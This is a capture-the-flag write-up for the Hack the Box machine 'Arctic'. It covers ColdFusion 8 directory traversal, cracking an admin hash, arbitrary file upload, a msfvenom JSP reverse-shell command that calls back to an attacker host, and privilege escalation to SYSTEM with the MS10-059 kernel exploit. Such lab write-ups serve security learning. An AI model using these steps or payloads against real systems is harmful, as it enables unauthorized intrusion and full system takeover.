Post

Arctic

Posted Updated
By Peter Soverns 2 min read

Overview

Arctic is a vulnerable machine from Hack the Box that requires some basic web enumeration with using exploits to grab credentials and get a shell. The foothold is accomplished after using a public exploit that will allow for arbitrary file upload. The privilege escalation/abuse is using a file on the machine is done through a kernel level exploit that allows us to get a shell back through a public exploit as the nt authority\system.

Nmap Scan

sudo nmap -sS -Pn 10.10.10.11 -vvv

  • 135/tcp open msrpc syn-ack ttl 127
  • 8500/tcp open fmtp syn-ack ttl 127
  • 49154/tcp open unknown syn-ack ttl 127

Web page here: http://10.10.10.11:8500/

Basic Enumeration

Going out to the web page on port 8500, we see two file directories, CFIDE and cfdocs. Looking through these, we eventually find administrator, asking for admin credentials. The web server appears to be an Adobe ColdFusion 8 developer server.

  • Using an exploit to abuse directory traversal, we are able to grab a hash for a password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
  • https://www.exploit-db.com/exploits/14641

We get this password happyday, and we can sign into the administrator login portal.

Foothold

There is a lot here, so we can either find a path here, or go back and look around more for other exploits.

  • Looking around further, we see these kinds of server’s have arbitrary file upload available to abuse.
  • https://github.com/nipunsomani/Adobe-ColdFusion-8-File-Upload-Exploit

In order to use this, we will either need to get a reverse .jsp shell, or we can generate one with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.5 LPORT=8081 -f raw > shell.jsp

  • After running this, we can get a connection back to our attacker machine with netcat waiting. We are now on the box as user tolis. We have user.txt.

User

Local Enumeration

We can run systeminfo, and run local exploit suggester to find possible paths to Privilege Escalation. Trying to run winpeas doesn’t seem to work, and trying to run powershell on top of the shell seems to break the current foothold.

  • In order to find a way to run winpeas on the machine, we ended up pulling down a powershell reverse tcp script to get a powershell shell. From here, we then brough over a meterpreter shell, and got a connection back. We did this to have a more stable shell.
  • Using msfvenom to create a regular windows/shell_reverse_tcp didn’t work for us to execute on the host, which is why we opted for the meterpreter shell.

Privilege Escalation

When doing exploit suggester, we get a lot of possible options, and the guided mode from HTB suggests to try to exploit the vulnerability related to MS10-059.

  • https://learn.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-059
  • POC: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

We pull the file MS10-059.exe onto the host, and execute this as the following to get a shell back as the administrator: MS10-059.exe <hackerip> <listeningport>

  • Now we have access as nt authority\system, and can read root.txt:

Root

ctf, security, hacking, exploits, web application, directory listing, arbitrary file upload, misconfiguration
ctf security hacking exploits web application directory listing arbitrary file upload misconfiguration
This post is licensed under CC BY 4.0 by the author.